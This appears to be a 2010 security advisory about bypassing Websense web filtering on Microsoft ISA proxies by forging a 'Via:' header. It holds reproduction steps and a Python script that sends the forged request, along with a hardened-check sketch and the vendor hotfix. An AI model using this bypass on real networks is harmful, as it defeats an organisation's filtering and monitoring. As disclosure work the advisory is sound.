Wednesday, August 18, 2010

Websense/ISA "Via:" Bypass Redux


discovered by mrhinkydink

PRODUCT: Websense Enterprise

EXPOSURE: Trivial Web Policy Bypass (III)


SYNOPSIS
========

On May 29, 2010 I demonstrated that by adding a "Via:" header to an HTTP request it is possible for a user to completely bypass filtering and monitoring in a Websense Enterprise 6.3.3/Microsoft ISA Server (2004 or 2006) proxy integration environment. This was addressed in Websense Knowledge Base article #5117.

However, anyone familiar with the Via bypass technique would have noticed that this remediation was insufficient: it still decides whether to filter based on a header the client controls.


PROOF OF CONCEPT
================

The following works in a Websense Enterprise system using the ISA Server integration product in a Cache Array Routing Protocol (CARP, sometimes referred to as "CRAP") configuration, which requires at least two ISA servers.

Assuming there are two ISA servers configured as per Websense Knowledge Base article #5117, one at IP address 10.10.0.1 and another at 10.10.0.2, perform the following:

I. Install Firefox >= 3.5

II. Configure Firefox to use one of the proxy servers in the CARP array (10.10.0.1).

III. Obtain and install the Modify Headers plug-in by Gareth Hunt

IV. Configure the plug-in to add a syntactically valid "Via:" header naming the other server in the array (the one the browser is NOT configured to use).

    Example: "Via: 1.0 10.10.0.2"

V. Browse to a filtered Web site

VI. All content is allowed without filtering, and the request does not appear in Websense monitoring/reporting.
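The steps above can be reproduced without Firefox or the plug-in, since all that matters is the bytes on the wire. The following Python is an added example, not code from the original post or from Websense/Microsoft: it forges the "Via:" value, builds the raw proxy request exactly as a browser would send it to 10.10.0.1, and, as a hypothetical model only, contrasts a header-only check (what a KB #5117-style remediation appears to rely on) with one that trusts a Via claim solely when the TCP peer really is the array member it names. The array addresses are the ones assumed in the post; the filter functions are illustrative and are not the actual ISA/Websense logic. The Via parser goes slightly beyond the single-hop case in the post and handles multi-hop values.

```python
"""Forge a "Via:" header claiming the request already traversed another CARP
array member, the way the Modify Headers steps above do it by hand.

Added example. ARRAY_MEMBERS is taken from the post's assumed setup; the two
filter_needed_* functions are a hypothetical model of the decision the proxy
makes, not Websense's or ISA's code."""
import socket
from urllib.parse import urlsplit

# Assumed CARP array from the post (two ISA servers).
ARRAY_MEMBERS = {"10.10.0.1", "10.10.0.2"}


def forge_via(other_member: str, version: str = "1.0") -> str:
    """Syntactically valid Via value naming another array member, e.g. '1.0 10.10.0.2'."""
    return f"{version} {other_member}"


def build_proxy_request(url: str, via: str) -> bytes:
    """Raw HTTP/1.1 request in absolute form (what a browser sends to a forward proxy),
    with the forged Via header inserted."""
    parts = urlsplit(url)
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    lines = [
        f"GET {parts.scheme}://{parts.netloc}{path} HTTP/1.1",
        f"Host: {parts.netloc}",
        f"Via: {via}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def send_through_proxy(proxy_host: str, proxy_port: int, url: str, via: str,
                       timeout: float = 10.0) -> str:
    """Send the forged request to one array member and return the proxy's status line.
    Needs network access to the proxy; not exercised offline."""
    with socket.create_connection((proxy_host, proxy_port), timeout=timeout) as s:
        s.sendall(build_proxy_request(url, via))
        return s.recv(4096).split(b"\r\n", 1)[0].decode("latin-1")


def via_hosts(headers: dict) -> list:
    """Hosts named in a Via header. Each comma-separated element is
    '[protocol/]version received-by [comment]' (RFC 2616 section 14.45);
    received-by may carry a :port, which is stripped here."""
    hosts = []
    for elem in headers.get("Via", "").split(","):
        fields = elem.split()
        if len(fields) >= 2:
            hosts.append(fields[1].split(":")[0])
    return hosts


def filter_needed_header_only(headers: dict) -> bool:
    """Hypothetical header-only check: skip filtering when Via names an array member.
    This is the property the PoC abuses, since the client writes the header."""
    return not any(h in ARRAY_MEMBERS for h in via_hosts(headers))


def filter_needed_peer_aware(headers: dict, peer_ip: str) -> bool:
    """Hypothetical hardened check: a Via claim is honoured only when the TCP peer
    is itself the array member the header names. A workstation forging
    'Via: 1.0 10.10.0.2' therefore still gets filtered."""
    return not (peer_ip in ARRAY_MEMBERS and peer_ip in via_hosts(headers))


if __name__ == "__main__":
    forged = forge_via("10.10.0.2")
    print(build_proxy_request("http://example.com/blocked", forged).decode())
    # Uncomment with the array reachable:
    # print(send_through_proxy("10.10.0.1", 8080, "http://example.com/blocked", forged))
```

Running the script prints the exact request the Firefox plug-in would produce; pointing send_through_proxy at the array reproduces step V. The peer-aware model is only a sketch of why the header alone cannot be trusted; the real fix is the vendor hotfix listed under WORK-AROUNDS.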


PoC RESTRICTIONS
================

All restrictions of the original Via Bypass article apply.

See http://mrhinkydink.blogspot.com/2010/05/websense-633-via-bypass.html

OTHER USES
==========

Limited only by your imagination! You do have an imagination, don't you?

See http://mrhinkydink.blogspot.com/2010/05/websense-633-via-bypass.html


WORK-AROUNDS
============

Install Hotfix 17 provided by Websense.

HISTORY
=======

06/25/2010 - vendor notified

08/13/2010 - vendor releases Hotfix 17

08/18/2010 - PoC published



c. MMX mrhinkydink
